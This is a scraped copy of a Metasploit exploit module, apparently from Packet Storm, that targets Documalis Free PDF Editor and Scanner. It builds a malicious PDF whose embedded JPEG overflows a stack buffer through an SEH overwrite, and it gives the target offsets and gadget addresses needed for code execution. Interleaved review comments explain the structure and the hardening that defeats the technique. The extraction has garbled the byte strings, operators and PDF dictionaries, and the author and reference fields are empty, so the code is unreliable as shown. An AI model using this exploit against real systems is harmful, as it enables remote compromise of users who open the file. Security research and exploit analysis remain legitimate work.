


Documalis Free PDF Editor 5.7.2.26 / Documalis Free PDF Scanner 5.7.2.122 Buffer Overflow ≈ Packet Storm



##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit file-format exploit module for Documalis Free PDF Editor 5.7.2.26
# and Documalis Free PDF Scanner 5.7.2.122: a PDF is written to disk whose
# embedded JPEG image overflows a stack buffer in the viewer's decoder.
#
# NOTE(review): this is a web-scraped copy, not the module as published, and
# it does not parse as shown. Extraction damaged several tokens: `< <` is the
# append operator `<<` with a stray space, the `\x` escapes in the JPEG byte
# strings lost their backslashes (`"xFFxD8..."`), and the PDF dictionary
# literals were collapsed to `< >` (their contents are not recoverable from
# this page). The comments below describe structure only; treat the upstream
# metasploit-framework repository as the canonical source.
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Seh

# Registers module metadata and the FILENAME option.
#
# Both targets share the same 433-byte offset and use a gadget address inside
# the application's own executable image (0x0040xxxx); the technique therefore
# depends on that image being loaded at its preferred base. From a hardening
# standpoint this is exactly what per-binary ASLR (/DYNAMICBASE) and SafeSEH
# are meant to defeat.
#
# @param info [Hash] module info merged by update_info
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
'Description' => %q{
Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not
appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit
this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the
user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery and PoC
# NOTE(review): the module author's name is an empty string in this copy
'', # Metasploit module
],
'References' =>
[
# NOTE(review): empty in this copy; the published module presumably cites
# the advisory/PoC — verify against upstream before relying on this listing
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
# 2388 (fixed JPEG stream length, see jpeg) - 232 (JPEG prologue)
# - 433 (Offset) - 8 (SEH record) = 1715
'Space' => 1715,
'DisableNops' => true
},
'Targets' =>
[
[
'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
{
'Ret' => 0x0040160D, # pop esi # pop ebx # ret - PDFEditor.exe
'Offset' => 433
}
],
[
'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
{
'Ret' => 0x004023FC, # pop edx # pop ebx # ret - DocumentScanner.exe
'Offset' => 433
}
]
],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
# A failed attempt crashes the viewer process — a noisy, user-visible event
# worth correlating with the ARTIFACTS_ON_DISK side effect during IR.
'Stability' => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Privileged' => false,
'DisclosureDate' => 'May 22 2020',
'DefaultTarget' => 0
)
)

register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
]
)
end





# Writes the document produced by make_pdf to the FILENAME path
# (file_create comes from Msf::Exploit::FILEFORMAT).
def exploit
file_create(make_pdf)
end

# Builds the JPEG stream that make_pdf embeds as image XObject 7.
#
# The first fifteen string literals (232 bytes once the `\x` escapes are
# restored) form a JPEG prologue: SOI (FF D8), an APP14 "Adobe" segment
# (FF EE .. 41 64 6F 62 65), a DQT table (FF DB), an SOF0 frame header
# (FF C0) declaring 8-bit samples, height 0x0032 = 50, width 0x00E6 = 230 and
# four components — matching the /Height, /Width and /DeviceCMYK entries
# make_pdf writes — and a DHT table (FF C4). The remainder is the
# SEH-overwrite layout: target['Offset'] filler bytes, the SEH record built
# from target.ret, the encoded payload, then random padding up to a fixed
# total of 2388 bytes.
#
# @return [String] binary JPEG data; 2388 bytes long as long as the encoded
#   payload respects the 1715-byte Space limit declared in initialize (if it
#   did not, `2388 - buffer.length` would be negative — presumably rand_text
#   then returns an empty string, but the fixed length would no longer hold)
def jpeg
buffer = "xFFxD8xFFxEEx00x0Ex41x64x6Fx62x65x00x64x80x00x00"
buffer < < "x00x02xFFxDBx00x84x00x02x02x02x02x02x02x02x02x02"
buffer < < "x02x03x02x02x02x03x04x03x03x03x03x04x05x04x04x04"
buffer < < "x04x04x05x05x05x05x05x05x05x05x05x05x07x08x08x08"
buffer < < "x07x05x09x0Ax0Ax0Ax0Ax09x0Cx0Cx0Cx0Cx0Cx0Cx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Cx0Cx0Cx0Cx01x03x02x02x03x03x03x07x05"
buffer < < "x05x07x0Dx0Ax09x0Ax0Dx0Fx0Dx0Dx0Dx0Dx0Fx0Fx0Cx0C"
buffer < < "x0Cx0Cx0Cx0Fx0Fx0Cx0Cx0Cx0Cx0Cx0Cx0Fx0Cx0Ex0Ex0E"
buffer < < "x0Ex0Ex0Cx11x11x11x11x11x11x11x11x11x11x11x11x11"
buffer < < "x11x11x11x11x11x11x11x11xFFxC0x00x14x08x00x32x00"
buffer < < "xE6x04x01x11x00x02x11x01x03x11x01x04x11x00xFFxC4"
buffer < < "x01xA2x00x00x00x07x01x01x01x01x01x00x00x00x00x00"
buffer < < "x00x00x00x04x05x03x02x06x01x00x07x08x09x0Ax0Bx01"
buffer < < "x54x02x02x03x01x01x01x01x01x00x00x00x00x00x00x00"
buffer < < "x01x00x02x03x04x05x06x07"
buffer < < rand_text(target['Offset']) # Junk
buffer < < generate_seh_record(target.ret)
buffer < < payload.encoded
# Pad to the fixed stream length so /Length in make_pdf is stable
buffer < < rand_text(2388 - buffer.length)
buffer
end

# Assembles the PDF and returns it via finish_pdf (Msf::Exploit::PDF).
#
# Objects 1–5 are dictionaries whose contents were stripped to `< >` in this
# copy. Object 6 is a content stream that draws image resource /I0 scaled to
# 265x229 points at (41, 522). Object 7 is the image XObject (/DCTDecode,
# 230x50, DeviceCMYK) whose data is the buffer returned by jpeg.
#
# NOTE(review): `jpeg` is called twice — once for the /Length entry and once
# for the stream body — so the two results differ in their random filler
# bytes. /Length is still correct because both are the fixed 2388 bytes, but
# memoizing the result would avoid the duplicate generation. Note also that
# '>>' is appended without eol, so the dictionary closes on the same line as
# the `stream` keyword.
#
# @return [String] the finished PDF document
def make_pdf
@pdf < < header
add_object(1, '< >')
add_object(2, '< >')
add_object(3, '< >>>/MediaBox[0 0 612.0 792.0]>>')
add_object(4, '[/PDF/Text/ImageC]')
add_object(5, '< >')
stream_1 = 'stream' < < eol
stream_1 < < '0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q' << eol
stream_1 < < 'endstream' << eol
add_object(6, "< >#{stream_1}")
stream = '< <' << eol
stream < < '/Width 230' << eol
stream < < '/BitsPerComponent 8' << eol
stream < < '/Name /X' << eol
stream < < '/Height 50' << eol
stream < < '/Intent /RelativeColorimetric' << eol
stream < < '/Subtype /Image' << eol
stream < < '/Filter /DCTDecode' << eol
stream < < "/Length #{jpeg.length}" << eol
stream < < '/ColorSpace /DeviceCMYK' << eol
stream < < '/Type /XObject' << eol
stream < < '>>'
stream < < 'stream' << eol
stream < < jpeg << eol
stream < < 'endstream' << eol
add_object(7, stream)
finish_pdf
end
end




